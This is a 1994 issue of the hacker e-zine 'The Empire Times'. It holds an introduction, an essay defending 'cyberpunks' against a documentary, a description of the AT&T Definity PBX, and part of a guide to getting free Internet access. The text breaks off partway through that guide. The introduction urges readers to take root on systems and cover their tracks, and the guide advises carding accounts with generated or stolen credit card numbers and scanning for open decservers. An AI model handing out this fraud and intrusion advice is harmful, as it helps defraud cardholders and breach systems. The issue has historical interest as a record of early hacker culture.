1843 lines
75 KiB
Plaintext
1843 lines
75 KiB
Plaintext
![]() |
From armitage@dhp.com Sun Sep 25 19:26:49 1994
|
|||
|
Date: Sun, 25 Sep 1994 15:48:19 -0400
|
|||
|
From: armitage@dhp.com
|
|||
|
To: dtangent@fc.net
|
|||
|
|
|||
|
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
|||
|
% T H E E M P I R E T I M E S %
|
|||
|
% ------------------------------- %
|
|||
|
% The True Hacker Magazine %
|
|||
|
% %
|
|||
|
% September 13th, 1994 Issue 4 %
|
|||
|
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
|||
|
|
|||
|
This Issues Features:
|
|||
|
|
|||
|
# Selection Author Size
|
|||
|
- --------------------------- --------- ----
|
|||
|
X. Introduction albatross 3k
|
|||
|
1. The Cyber-punk Image firefly 7k
|
|||
|
2. AT&T Definity System 75/85 erudite 15k
|
|||
|
3. How to get free Internet Pud C0ur13r 14k
|
|||
|
4. The Octel VMB System da telcopimp 20k
|
|||
|
5. My Life as a Narc... noelle 10k
|
|||
|
6. Hacking Simplex Locks erudite 3k
|
|||
|
7. SS7 / Caller ID Discussion grendal 6k
|
|||
|
8. Don't Tell us Our Name erudite 3k
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
Founder: Albatross
|
|||
|
Organizer: Armitage
|
|||
|
Contributors: Da Telcopimp,
|
|||
|
Erudite,
|
|||
|
Firefly,
|
|||
|
Grendal,
|
|||
|
Noelle,
|
|||
|
PuD Courier.
|
|||
|
Special Thanks: AT&T,
|
|||
|
Sevenup.
|
|||
|
|
|||
|
===========================================================================
|
|||
|
|
|||
|
-=- The Empire Times -=-
|
|||
|
Introduction
|
|||
|
|
|||
|
Yes it is true. The Empire Times is back online and ready for
|
|||
|
a little rok -n- roll. The plan is to bring back what appears to be
|
|||
|
lost from the underground world. The Times will go into details on
|
|||
|
topics of Cellular fone phreaking to the personal lives of those
|
|||
|
hackers which we all know and love.
|
|||
|
|
|||
|
I believe this issue will spark the intrest of those who have
|
|||
|
become cyber-potatoes and those who have yet to realize what a UNIX
|
|||
|
system is all about.
|
|||
|
|
|||
|
It is time for the Hacker Klan to unite and share information
|
|||
|
so that we can expand our realm of control over the growing InterNet
|
|||
|
which we love so much. Just think how much money is spent to keep us
|
|||
|
out of systems which (as we all know) never works. I have always believed
|
|||
|
that if there is a way for a regular user to access a system, then
|
|||
|
there is a way in.
|
|||
|
|
|||
|
Always use your brain as to the capablities of the agencies
|
|||
|
which are our to stop us, such as the FBI, S.S., and the Military.
|
|||
|
When obtaining 'root' at sites, always remember to hide your tracks
|
|||
|
into the system. Check for log files, see what wrappers and possible
|
|||
|
cron jobs which might be running to catch you. Those who prevail shall
|
|||
|
always be known as 'Elite'. Those who fail just didn't learn the tricks
|
|||
|
of the trade fast enough.
|
|||
|
|
|||
|
Just remeber that we are building a MAFIA on the InterNet, if
|
|||
|
you want it to succeed, then YOU know what has to be done. So keep
|
|||
|
your minds growing and those electrons flowing.
|
|||
|
|
|||
|
Last words
|
|||
|
==========
|
|||
|
|
|||
|
To the Virginia Crue: If the South is to rise again, Ya'll are
|
|||
|
the ones that'll do it.
|
|||
|
|
|||
|
To the Maryland Crue: We have more Net access than any state.
|
|||
|
Make sure that ya'll keep it like that.
|
|||
|
Smoke it like a NeckBone.
|
|||
|
|
|||
|
To the D.C. Crue: I've never see so many hacked outdials and
|
|||
|
PBX's. Keep it that way. Don't 4 get your 9mm.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
"I'm only trying to build an Empire."
|
|||
|
-Alby
|
|||
|
|
|||
|
|
|||
|
==============================================================================
|
|||
|
|
|||
|
-=- The Empire Times -=-
|
|||
|
Volume 2, Issue 4, File 1 of 8
|
|||
|
The Cyberpunk Image
|
|||
|
by firefly
|
|||
|
|
|||
|
There's a new flick that they are showing at schools in the area this
|
|||
|
year. It's one of those documentaries that is produced exclusively for
|
|||
|
educators that targets a certain culture and proceeds to slander against it.
|
|||
|
"Cyberpunk" is such a movie. I had the unfortunate luck to sit through it in
|
|||
|
a general education program in college last semester. That was bad enough
|
|||
|
...but then I had to show it to a class this summer and then spark discussion
|
|||
|
about it when I disagreed with the entire theme of the movie!
|
|||
|
|
|||
|
The movie "Cyberpunk" was a documentary that showed the use of
|
|||
|
computers and continued the media's hype of the so-called "cyberculture".
|
|||
|
The film was well-done, and well-organized, but I disagree with what I
|
|||
|
consider are the film's themes about the "computer generation"
|
|||
|
(a.k.a.: cyber-punks). Not to mention the fact it was written entirely in
|
|||
|
"computer-esque" with techno music, rapid-picture imagery, and other
|
|||
|
"information age" fads. This paper will discuss the term "cyberpunk" itself,
|
|||
|
offer observations about this culture, and conclude with the true nature of
|
|||
|
the computer generation.
|
|||
|
|
|||
|
The term cyberpunk, coined by William Gibson in his Neuromancer book,
|
|||
|
is a literary and now, thanks to the media, an overused term used to describe
|
|||
|
every type of "console cowboy" from a computer programmer to a malicious
|
|||
|
electronic explorer, to someone who sees a Gibson-esque future run by
|
|||
|
computers, to someone who dresses in leather, and carries a digital pager.
|
|||
|
The term "punk" usually refers to someone against the current cultural norms
|
|||
|
of society. The so-called cyberpunks are considered the small segment of
|
|||
|
society that is against the current norms of "regular people". Well, the
|
|||
|
truth of the matter is that these "cyber-dudes" have grown up around
|
|||
|
computers, digital games, and electronic tools in the classroom and workplace.
|
|||
|
Is it their fault that computers have simplified many redundant tasks in
|
|||
|
society? Is it these people's fault that computers now help fly aircraft,
|
|||
|
make cars, improve international communication? NO!
|
|||
|
|
|||
|
This computer generation is simply the first generation to pioneer
|
|||
|
such a radically new concept of existence. While our forefathers saw things
|
|||
|
in a linear perspective, we see them in a virtual reality that can be changed
|
|||
|
into a nonlinear environment depending on our virtual vantage point. Timothy
|
|||
|
Leary would say this is "consciousness-expansion". Consider your parents and
|
|||
|
the advent of television or the superhighway across your home state. Your
|
|||
|
parents saw it as revolutionary, and possibly frightening that automobiles
|
|||
|
could "drive" in 6-8 lanes of 55mph traffic across the nation. They probably
|
|||
|
saw the political and Orwellian problems with having a video receiver in their
|
|||
|
living rooms that could broadcast political messages. But they adapted and
|
|||
|
grew up with it, while their parents looked on in amazement. The same holds
|
|||
|
true with the electronic age. My generation grew up with Atari, Apple,
|
|||
|
Windows, and modems. We are used to "driving" with multiple pathways
|
|||
|
simultaneously -- parallel processing -- our lives, and utilizing the vast
|
|||
|
speed that information or data takes these days to further advance ourselves.
|
|||
|
|
|||
|
This illustrates how those in power of any sort -- political, literary,
|
|||
|
media, business -- see this generation, as a band of people who use strange
|
|||
|
things to live their lives. Well, the television was strange to my
|
|||
|
grandmother, but she adapted -- as my mother grew up with it --, and so will
|
|||
|
this generation of leaders adapt as our generation of people grow up with
|
|||
|
computers. The difference with this computer generation is that we deal with
|
|||
|
so much information at such a rapid pace, that those who look on us (ie,
|
|||
|
policymakers and journalists) cannot keep up with it...hence the fear of what
|
|||
|
they don't know. "Cyberpunk" sounds evil. The unknown is evil. Therefore,
|
|||
|
since nobody understands the cyber-culture, those that do are therefore evil.
|
|||
|
Simple societal algebra. The movie is full of stereotypes. Firstly, there is
|
|||
|
no cyberpunk standard for music. People think techno is the music of the
|
|||
|
computer age because it is fast and computer-generated. False. Granted, many
|
|||
|
people who like techno like computers, but a history book of 2020 should not
|
|||
|
show the 1990s' cyber-culture liking techno in the same way as 18th century
|
|||
|
victorians enjoyed the waltz. Outstanding on-line magazine UXU-148
|
|||
|
Technophilia mentions that the cyber-culture likes any form of music, and
|
|||
|
not only computer-generated tunes. I associate with hackers, and people the
|
|||
|
media calls "cyberpunks". Our music ranges from hard rock and metal to movie
|
|||
|
soundtracks to top forty to reggae, and some techno. Yet, throughout the
|
|||
|
movie, viewers are led to believe that fast techno is the "music of the
|
|||
|
cyberpeople." Granted, a "rave" is an all-night computer-controlled techno
|
|||
|
event is the climactic part of being a part of a cyberculture, but not
|
|||
|
symbolic of the entire culture of computer-users.
|
|||
|
|
|||
|
There was "lotsa leather". Again, another stereotype. True, the
|
|||
|
classic street punk wore combat boots and a leather jacket, but to imply that
|
|||
|
this is how an entire subculture dresses is absurd! To dispel this myth, and
|
|||
|
meet the movie on its own level of stereotyping, go to any rave, which many
|
|||
|
consider the climactic event in the cyberculture. The fashion ranges from the
|
|||
|
sublime to the ridiculous, from exotic to erotic, from jeans and T-shirts to
|
|||
|
leather and handcuffs. Mostly people dress the way they go to a dance club.
|
|||
|
The people they interviewed in the movie were interviewed at a convention,
|
|||
|
or another public place, where they are dressing to make an impression. Just
|
|||
|
because someone wears leather at a convention or on a documentary tape does
|
|||
|
not mean he/she represents the entire culture being profiled, or that the
|
|||
|
person dresses like that regularly. I know of very few hard-core cyber-kids
|
|||
|
who dress that way. I frequently wear shorts, jeans, t-shirts and turtlenecks.
|
|||
|
Part of my accessories is a pager and ATM card. Gee. According to Cyberpunk,
|
|||
|
I cannot be a member of the cyberculture, since I don't own a leather jacket
|
|||
|
or have long hair.
|
|||
|
|
|||
|
Enough ranting. I've got better things to do. But I just thought it
|
|||
|
interesting that this flick is shown as an (and meant to be an) " objective
|
|||
|
educational tool" to college students to show them about computers and
|
|||
|
society, but portrays them as evil, conniving thugs.
|
|||
|
|
|||
|
|
|||
|
Votes on next topic: Business Intelligence? or Social Engineering?
|
|||
|
|
|||
|
|
|||
|
==============================================================================
|
|||
|
|
|||
|
-=- The Empire Times -=-
|
|||
|
Volume 2, Issue 4, File 2 of 8
|
|||
|
AT&T Definity System 75/85
|
|||
|
by erudite
|
|||
|
|
|||
|
================================
|
|||
|
AT&T Definity System 75/85
|
|||
|
Communications System
|
|||
|
Description & Configuration
|
|||
|
================================
|
|||
|
=====
|
|||
|
Intro
|
|||
|
=====
|
|||
|
|
|||
|
Let me introduce you to the AT&T Definity System 75/85. This communications
|
|||
|
system is a product of the merging of the AT&T System 75 and System 85
|
|||
|
architectures. The name Definity came from the two words "definitive" and
|
|||
|
"infinity".
|
|||
|
|
|||
|
Let me also tell you that there are many different communications systems
|
|||
|
out there. (Merlins, AT&Ts) Many many many, I couldnt name them all, but
|
|||
|
the AT&T systems are nice. I enjoy working with them, and I hope you enjoy
|
|||
|
this text file.
|
|||
|
|
|||
|
This System is an advanced business communications system. A Digital
|
|||
|
Communications Protocol (DCP) allows data communication through data
|
|||
|
terminal equipment connected to the digital switch. This allows the
|
|||
|
system to handle data and voice communications simultaneously.
|
|||
|
|
|||
|
The System can handle up to 1600 lines that supports all digital, hybrid,
|
|||
|
and analog terminals and equipment. Up to 400 trunks, and up to 400
|
|||
|
Automatic Call Distribution (ACD) Agents. The Data switching capacity is up
|
|||
|
to 800 digital data endpoints<74>, and 160 integrated and combined pooled modem
|
|||
|
facilities.
|
|||
|
|
|||
|
<EFBFBD> Digital Data Endpoints include the following:
|
|||
|
<20> 510D Personal Terminal or 515-Type Business Communications Terminal
|
|||
|
<20> 7404D Terminals
|
|||
|
<20> 7406D or 7407D Equipped with optional Data Module Base
|
|||
|
<20> Asynchronous Data Units (ADU) (DCE type device that has rs232c interface)
|
|||
|
<20> Digital Terminal Data Modules
|
|||
|
<20> 3270 Data Modules
|
|||
|
<20> Internal Data Channels
|
|||
|
<20> Trunk Data Modules (Modular)
|
|||
|
<20> Processor Data Modules (Modular)
|
|||
|
|
|||
|
==========
|
|||
|
Networking
|
|||
|
==========
|
|||
|
|
|||
|
The Processor Port Network (PPN) always provides the switch processing
|
|||
|
element (SPE) and port circuits. An Expansion Port Network (EPN) is
|
|||
|
available to increase line size of any system by allowing you to add
|
|||
|
additionnal port circuits. The EPN connects to the PPN over a fiber
|
|||
|
optic cable that may be up to 1.86 miles remotely situated. It may also
|
|||
|
by located adjacent to the PPN.
|
|||
|
|
|||
|
This System may be arranged stand-alone or you can integrate it into a
|
|||
|
private network. You can form these types of Networks:
|
|||
|
<09> Tandem Tie Trunk Network (TTTN)
|
|||
|
<09> Electronic Tandem Network (ETN)
|
|||
|
<09> Main/Satellite Configuration
|
|||
|
<09> Distributed Communications System (DCS)
|
|||
|
<09> Centralized Attendant Service (CAS)
|
|||
|
|
|||
|
An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI)
|
|||
|
makes it possible for the Definity System to access various private and
|
|||
|
public network services. With ISDN-PRI the you can access these services:
|
|||
|
<09> Call by Call Service Selection
|
|||
|
<09> Private Network Services
|
|||
|
<09> Information Forwarding
|
|||
|
<09> Call Identification Display
|
|||
|
- Connected Number Display
|
|||
|
- Connected Party Name Display
|
|||
|
- Calling and Called Number Record Display
|
|||
|
- Calling and Called Party Name Display
|
|||
|
|
|||
|
=============
|
|||
|
Configuration
|
|||
|
=============
|
|||
|
|
|||
|
The Actual System is encased in a pair of "cabinets" which have a fiber
|
|||
|
optic link between them. It is also common to have a stack of about three
|
|||
|
"cabinets" of a smaller size, for different models.
|
|||
|
|
|||
|
Shown here is a typical multi-carrier system with a Processor Port Network
|
|||
|
(PPN) cabinet and Expansion Port Network (EPN) cabinet.
|
|||
|
|
|||
|
attendant outside trunks _____ outside private line
|
|||
|
consoles and lines / data transmission equipment or
|
|||
|
\ \ / analog switched network
|
|||
|
\ fiber optic | |
|
|||
|
| connetion | | __ business communication
|
|||
|
-+---------/~\--------+--+ / terminals
|
|||
|
| AT&T | | AT&T | |
|
|||
|
| DEFINITY | | DEFINITY +------' ___data
|
|||
|
---+ SYSTEM | | SYSTEM +--------<>------[audix] / terminals
|
|||
|
/ | 75/85 | | 75/85 | modular data /
|
|||
|
| |___________| |__________+| processor ____ |
|
|||
|
manager | | | | +'optional host
|
|||
|
terminal | | +-------<>----------+ | computer or call
|
|||
|
/ +-------[]-----+, |____| management system
|
|||
|
/ asynchronous |
|
|||
|
single line data unit \__ data
|
|||
|
voice terminals terminals
|
|||
|
|
|||
|
|
|||
|
===================
|
|||
|
Voice and Data
|
|||
|
Management Features
|
|||
|
===================
|
|||
|
|
|||
|
There are alot of voice features and services, in fact, too many to list, I
|
|||
|
will do a run down on all the interesting and useful features and services.
|
|||
|
It has many Voice Management, Data Management, Network Services, System
|
|||
|
Management, Hospitality Services, and Call Management Services.
|
|||
|
|
|||
|
<EFBFBD> Attendant Display: Contains useful call related information that the
|
|||
|
call attendant can use to operate the console more efficiently
|
|||
|
<EFBFBD> Audio Information Exchange Interface (AUDIX): This interface allows
|
|||
|
both inside system users and remote callers to edit, recieve, send,
|
|||
|
write, and forward voice messages.
|
|||
|
<EFBFBD> Authorization Codes: A means to control user privileges throughout the
|
|||
|
system.
|
|||
|
<EFBFBD> Automatic Incoming Call Display: Shows identity of remote caller and relays
|
|||
|
it to the display console.
|
|||
|
<EFBFBD> Class of Restriction: Defines up to 64 classes of user restriction.
|
|||
|
<EFBFBD> Conference Service
|
|||
|
- Attendant Conference: Allows Attendant to construct a conference call
|
|||
|
- Terminal Confernce: Allows remote user to construct a conference call
|
|||
|
without attendant assistance.
|
|||
|
<EFBFBD> Data Privacy: This, when activated by user, protects analog data calls from
|
|||
|
being interrupted by any of the systems overriding features, and denies
|
|||
|
ability to gain access to, and or superimpose tones.
|
|||
|
<EFBFBD> Data Restriction: This feature is the same as Data Privacy, except that it
|
|||
|
is issued by the administrator to a certain extension # for indication of
|
|||
|
a dedicated private data extension.
|
|||
|
<EFBFBD> DCS Call Forwarding All Calls: This is the voice forwarding service.
|
|||
|
<EFBFBD> DCS Distinctive Ringing: This is simply a distinctive ringing feature.
|
|||
|
<EFBFBD> Dial Access: This is simply the package of features that allows anyone in
|
|||
|
the system to dial anyone else, such as the attendant console.
|
|||
|
<EFBFBD> DS1 Tie Trunk Service: This service provides a digital interface for
|
|||
|
the following trunks and more.
|
|||
|
<09> Voice Grade DS1 Tie Trunks
|
|||
|
<09> Alternative Voice/Data (AVD) DS1 Tie Trunks
|
|||
|
<09> Digital Multiplexed Interface (DMI) Tie Trunks
|
|||
|
<09> Central Office (CO) Trunks
|
|||
|
<09> ISDN-PRI Trunks
|
|||
|
<09> Remote Access Trunks
|
|||
|
<09> Wide Area Telecommunications Service (WATS) Trunks
|
|||
|
<EFBFBD> Facility Test Calls: Provides voice terminal user who is capable of all
|
|||
|
features and functions that is used for maintenance testing. Such as access
|
|||
|
to system tones, access to specific trunks, etc.
|
|||
|
Note: AT&T designed the Facility Test Calls Feature for testing
|
|||
|
purposes only, and system maintenance. When properly
|
|||
|
administered, AT&T claims that the customer is responsible for
|
|||
|
all security items, and secure system from unauthorized users,
|
|||
|
and that all users should be aware of handling access codes.
|
|||
|
AT&T claims they will take no responsibility for poor
|
|||
|
administration.
|
|||
|
<EFBFBD> Hunting: The internal hunting feature is very nice, as you probably know,
|
|||
|
it rings down if busy, or if it recieves a dial timeout.
|
|||
|
<EFBFBD> Information System Network Interface (ISN): AT&T ISN is a
|
|||
|
packet switched local area network that will link with mainframes,
|
|||
|
workstations, personal computers, printers, terminals, storage devices,
|
|||
|
and communication devices.
|
|||
|
<EFBFBD> Integrated Services Digital Network Primary Rate Interface (ISDN-PRI):
|
|||
|
This interface allows connection of the system to an ISDN Network by means
|
|||
|
of ISDN frame format called PRI.
|
|||
|
<EFBFBD> Inter-PBX Attendant Calls: Positions for more than one branch, and each
|
|||
|
branch has a Listed Directory Number (LDN).
|
|||
|
<EFBFBD> Modem Pooling: Switches connections of digital data endpoints.
|
|||
|
<EFBFBD> Network Access (Private): Connect to the following Networks
|
|||
|
<09> Common Control Switching Arrangement (CCSA)
|
|||
|
<09> Electronic Tandem Network (ETN)
|
|||
|
<09> Enhanced Private Switched Communications Service (EPSCS)
|
|||
|
<09> Tandem Tie Trunk Network (TTTN)
|
|||
|
<09> Software Defined Network (SDN)
|
|||
|
<EFBFBD> Network Access (Public): Access to public networks.
|
|||
|
<EFBFBD> Privacy: Protects from others bridging into their extensions.
|
|||
|
<EFBFBD> Remote Access: This lets you access the system remotely, again, AT&T
|
|||
|
doesnt want to take responsibility for anything that is abused with this
|
|||
|
feature.
|
|||
|
<EFBFBD> Restrictions: There is a large list of restriction features that I'm sure
|
|||
|
would come in handy.
|
|||
|
<EFBFBD> Service Observing: Allows high access users to monitor
|
|||
|
others calls, again, AT&T does not want to take any legal fees on missuse
|
|||
|
on this feature.
|
|||
|
<EFBFBD> Transfers: Allows any user to do an attendant call transfer without an
|
|||
|
attendant's assistance.
|
|||
|
|
|||
|
========
|
|||
|
Software
|
|||
|
========
|
|||
|
|
|||
|
The System comes with swithced services software, administrative software,
|
|||
|
and maintenance software. All running on a real-time operating system.
|
|||
|
|
|||
|
<EFBFBD> Switched Services Software: This Software provides all the calling features
|
|||
|
and services. This also is responsible for relaying any information to the
|
|||
|
console display.
|
|||
|
<EFBFBD> Administrative Software: This Software is needed to run administrative
|
|||
|
tasks, and configurations.
|
|||
|
<EFBFBD> Maintenance Software: The Maintenance Software is used to
|
|||
|
keep everything running properly.
|
|||
|
|
|||
|
=====================
|
|||
|
System Administration
|
|||
|
=====================
|
|||
|
|
|||
|
The "Access Code" you will encounter on these systems is a 1, 2, or 3 digit
|
|||
|
number. The pound (#) and star (*) keys can be used as the first digit of the
|
|||
|
code. Below you will see a typical Screen Format taken from one of my logs,
|
|||
|
information aside you can see what the administration Screens look and feel
|
|||
|
like.
|
|||
|
|
|||
|
--------------------------------------------------------------------
|
|||
|
Page 1 of 4
|
|||
|
|
|||
|
STATION
|
|||
|
|
|||
|
Extension: ____
|
|||
|
Type: _____ Lock Messages: _ COR: _ Room: _____
|
|||
|
Port: ___________ Security Code: ____ COS: _ Jack: _____
|
|||
|
Name: ___________ Coverage Path: ___ Cable: _____
|
|||
|
|
|||
|
FEATURE OPTIONS
|
|||
|
|
|||
|
LWC Reception? _____ Headset? _ Coverage Msg Retrieval? _
|
|||
|
LWC Activation? _ Auto Answer? _ Data Restriction? _
|
|||
|
Redirect Notification? _ Idle Appearance Preferences? _
|
|||
|
PCOL/TEG Call Alerting? _
|
|||
|
Data Module? _ Restrict Last Appearance? _
|
|||
|
Display? _
|
|||
|
|
|||
|
ABREVIATED DIALINGS
|
|||
|
|
|||
|
List1: _____ List2: _____ List3: _____
|
|||
|
|
|||
|
BUTTON ASSIGNMENTS
|
|||
|
|
|||
|
1: _______ 6: _______
|
|||
|
2: _______ 7: _______
|
|||
|
3: _______ 8: _______
|
|||
|
4: _______ 9: _______
|
|||
|
5: _______
|
|||
|
|
|||
|
|
|||
|
-------------------------------------------------------------------
|
|||
|
|
|||
|
==================
|
|||
|
System Maintenance
|
|||
|
==================
|
|||
|
|
|||
|
Finally the Maintenance section, where you can see where the errors are
|
|||
|
logged, where all the alarms are sent, printed, etc.
|
|||
|
|
|||
|
There are 3 different types of alarms:
|
|||
|
<EFBFBD> Major Alarms (Critical Damage, requires immediate attention)
|
|||
|
<EFBFBD> Minor Alarms (Errors, still operable, requires action)
|
|||
|
<EFBFBD> Warning Alarms (no noticeable degradation of service, not reported to
|
|||
|
console or INADS)
|
|||
|
|
|||
|
The Error log is reported and can be viewed at The Manager Terminal,
|
|||
|
as well as the alarm log.
|
|||
|
|
|||
|
==============
|
|||
|
Basic Acronyms
|
|||
|
==============
|
|||
|
|
|||
|
ADU Asynchronous Data Unit
|
|||
|
AUDIX Audio Information Exchange
|
|||
|
COR Class of Restriction
|
|||
|
COS Class of Service
|
|||
|
DCP Digital Communications Protocal
|
|||
|
DMI Digital Multiplexed Interface
|
|||
|
EPN Expansion Port Network
|
|||
|
ISDN Integrated Service Digital Network
|
|||
|
PPN Processor Post Network
|
|||
|
PSDN Packet Switching Data Network
|
|||
|
|
|||
|
=====
|
|||
|
Tones
|
|||
|
=====
|
|||
|
|
|||
|
Here is most of the Tones, mostly either interesting ones or oftenly used
|
|||
|
tones the System. Here are the tones, the frequencies, and the moderations.
|
|||
|
|
|||
|
Tone Frequency Pattern
|
|||
|
---- --------- -------
|
|||
|
Answer Back 3 2225 Hz 3000 on
|
|||
|
Answer Back 5 2225 Hz 5000 on
|
|||
|
Bridging Warning 440 Hz 1750 on, 12000 off,
|
|||
|
650 on; repeated
|
|||
|
Busy 480 Hz + 620 Hz 500 on, 500 off; repeated
|
|||
|
Call Waiting
|
|||
|
Internal 440 Hz 200 on
|
|||
|
External 440 Hz 200 on, 200 off
|
|||
|
Attendant 440 Hz 200 on, 200 off
|
|||
|
Priority Call 440 Hz 200 on, 200 off, 200 on,
|
|||
|
200 off, 200 on
|
|||
|
Call Waiting
|
|||
|
Ring Back 440 Hz + 480 Hz; 900 on (440 + 480)
|
|||
|
440 Hz 200 on (440) 2900 off; repeated
|
|||
|
Cnrt Att Call
|
|||
|
Incoming Call
|
|||
|
Indentification 480 Hz & 440 Hz 100 on (480), 100 on (440),
|
|||
|
& 480 Hz 100 on silence;
|
|||
|
Dial Zero,
|
|||
|
Attendant Transfer,
|
|||
|
Test Calls, 440 Hz 100 on, 100 off, 100 on
|
|||
|
Coverage 440 Hz 600 on
|
|||
|
Confirmation 350 Hz + 400 Hz 100 on, 100 off, 100 on,
|
|||
|
100 off, 100 on
|
|||
|
Dial 250 Hz + 400 Hz Continuous
|
|||
|
Executive Override 440 Hz 300 on followed by
|
|||
|
Intercept 440 Hz & 620 Hz 250 on (440),
|
|||
|
250 on (620); repeated
|
|||
|
Ringback 440 Hz + 480 Hz 1000 on, 3000 off; repeated
|
|||
|
Zip 480 500 on
|
|||
|
|
|||
|
=====
|
|||
|
Outro
|
|||
|
=====
|
|||
|
|
|||
|
<EFBFBD> This file was based on the statistics for the AT&T Definity
|
|||
|
System 75/85 (multi-carrier cabinet model) communications system.
|
|||
|
|
|||
|
I hope you learned something, anywayz, questions comments, system login
|
|||
|
information, defaults, where to get manuals, or anything else.
|
|||
|
email me (armitage@dhp.com) and I will get back to you.
|
|||
|
|
|||
|
erudite (armitage on irc)
|
|||
|
|
|||
|
|
|||
|
==============================================================================
|
|||
|
|
|||
|
-=- The Empire Times -=-
|
|||
|
Volume 2, Issue 4, File 3 of 8
|
|||
|
How to Get a Free Internet Account
|
|||
|
by PuD C0ur13r
|
|||
|
|
|||
|
|
|||
|
I know the story. Your just starting out, and you don't have an
|
|||
|
internet account. And you don't want to pay for one, right? Well, here are
|
|||
|
some tips to getting free internet.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Freenets
|
|||
|
----------------
|
|||
|
|
|||
|
Oh bleh, you say. A freenet?!?!@#$ Well, yes, a freenet. Why not?
|
|||
|
You get a mailing address, a gopher, maybe usenet, maybe irc, maybe some
|
|||
|
other added features. Heck, on some freenets you get a shell account. But
|
|||
|
even if you don't get a shell account, there are many ways to get something
|
|||
|
of a shell. Vi, Veronica, gopher, and many other useful little bugs. This
|
|||
|
article is not for telling how to get shell on a freenet, because that would
|
|||
|
take up another article. But here are some freenets:
|
|||
|
|
|||
|
telnet to:
|
|||
|
|
|||
|
leo.nmc.edu login: visitor
|
|||
|
yfn.ysu.edu login: visitor
|
|||
|
freenet.scri.fsu.edu login: visitor
|
|||
|
freenet.carleton.edu login: guest
|
|||
|
freenet.victoria.bc.ca login: guest
|
|||
|
freenet.lorain.oberlin.edu login: guest
|
|||
|
freenet.hsc.colorado.edu login: guest
|
|||
|
bigcat.missouri.edu login: guest
|
|||
|
garbo.uwasa.fi login: guest
|
|||
|
ids.net login: guest
|
|||
|
bbs.augsburg.edu login: guest
|
|||
|
tpe.ncm.com login: guest
|
|||
|
michael.ai.mit.edu login: guest
|
|||
|
bbs.isca.uiowa.edu login: guest/new
|
|||
|
phred.pc.cc.cmu.edu 8888 login: guest/new
|
|||
|
muselab.ac.runet.edu login: bbs (send mail to 'gabe' to access irc)
|
|||
|
netaxs.com login: bbs
|
|||
|
shadow.acc.iit.edu login: bbs
|
|||
|
bbs.augsburg.edu login: bbs
|
|||
|
utbbs.civ.utwente.nl login: bbs
|
|||
|
oscar.bbb.no login: bbs
|
|||
|
bugs.mty.itesm.mx login: bbs
|
|||
|
tudrwa.tudelft.nl login: bbs
|
|||
|
ara.kaist.ac.kr login: bbs
|
|||
|
cc.nsysu.edu.tw login: bbs
|
|||
|
cissun11.cis.nctu.edu.tw login: bbs
|
|||
|
badboy.aue.com login: bbs
|
|||
|
tiny.computing.csbsju.edu login: bbs
|
|||
|
Quartz.rutgers.edu login: bbs
|
|||
|
bbs.fdu.edu login: bbs
|
|||
|
paladine.hacks.arizona.edu login: bbs
|
|||
|
freedom.nmsu.edu login: bbs
|
|||
|
kids.kotel.co.kr login: bbs
|
|||
|
wariat.org login: bbs
|
|||
|
seabass.st.usm.edu login: bbs pass: bbs
|
|||
|
heartland.bradley.edu login: bbguest
|
|||
|
freenet-in-a.cwru.edu login: <none>
|
|||
|
oubbs.telecom.uoknor.edu login: <none>
|
|||
|
chop.isca.uiowa.edu login: <none>
|
|||
|
pc2.pc.maricopa.edu 4228 login: <none>
|
|||
|
af.itd.com 9999 login: <none>
|
|||
|
hpx6.aid.no login: skynet
|
|||
|
launchpad.unc.edu login: launch
|
|||
|
atl.calstate.edu login: apa
|
|||
|
forest.unomaha.edu login: ef
|
|||
|
cue.bc.ca login: cosy
|
|||
|
softwords.bc.ca login: cosy
|
|||
|
vtcosy.cns.vt.edu login: cosyreg
|
|||
|
Nebbs.nersc.gov login: new
|
|||
|
Milo.ndsu.nodak.edu login: new pass: new
|
|||
|
tolsun.oulu.fi login: box
|
|||
|
mono.city.ac.uk login: mono pass: mono
|
|||
|
newton.dep.anl.gov login: cocotext
|
|||
|
kometh.ethz.ch answer at prompts: # call c600
|
|||
|
TERMSERV call avalon
|
|||
|
login: bbs
|
|||
|
|
|||
|
|
|||
|
Va Pen or School Internet
|
|||
|
----------------------------
|
|||
|
|
|||
|
I know that in Virginia, there is a semi-internet provider called
|
|||
|
Va Pen. I call it semi, because only teachers usually get a shell account.
|
|||
|
And the account will only last for a year, so then you have to subscribe for
|
|||
|
the account again.
|
|||
|
Also, your school might have some kind of internet feed. Try hooking
|
|||
|
up with that in any way possible.
|
|||
|
|
|||
|
|
|||
|
Card an Account
|
|||
|
-------------------
|
|||
|
|
|||
|
There isn't much to be said on this. For Delphi, all you usually
|
|||
|
need is a Credit Card Number Generator of some sort. The account will
|
|||
|
probably only last about a day, but you can do it as many times as you want.
|
|||
|
If you have a real CC number, with real name and address, then you will have
|
|||
|
a semi-legit account, but that will probably only last untill that person
|
|||
|
your carding gets his or her bill. :-) Experiment. Call up your local
|
|||
|
provider, and try carding it. Chances are, it will work.
|
|||
|
|
|||
|
|
|||
|
Decservers
|
|||
|
-----------------
|
|||
|
|
|||
|
Some decservers are hooked up to the internet. The only way you
|
|||
|
can find them is to scan for them. When you do find a decserver or two, do
|
|||
|
'show services' command. If you see anything that is remotely related to
|
|||
|
'telnet' or 'rlogin' then play around with it. You might be able to telnet
|
|||
|
to a site on the internet.
|
|||
|
|
|||
|
|
|||
|
1800 Internet
|
|||
|
-----------------
|
|||
|
|
|||
|
There are two kinds of 1800 Internet. One is a 1800 number that
|
|||
|
is kind of like a decserver, except its not. It lets you telnet like a
|
|||
|
decserver though, but it only lets you use IP numbers. I have only played
|
|||
|
around with a very few of these "decservers", because 1800 have ANI. And
|
|||
|
this kind of telnet gets used to hell, so it doesn't last very long. One
|
|||
|
person I knew got called by the authorities for using a 1800 "decserver".
|
|||
|
But its not really illegal to use, because you didn't have to hack it, or
|
|||
|
login into it. Its just there. But I wouldn't take that legal advice to
|
|||
|
heart, though.
|
|||
|
Another kind of 1800 Internet is where you can call up a unix and
|
|||
|
get an account through the 1800 number. Delphi has this, as does IIA.org.
|
|||
|
Cyberspace.net's number used to be 1800-833-6378, but I hear that it is
|
|||
|
down.
|
|||
|
|
|||
|
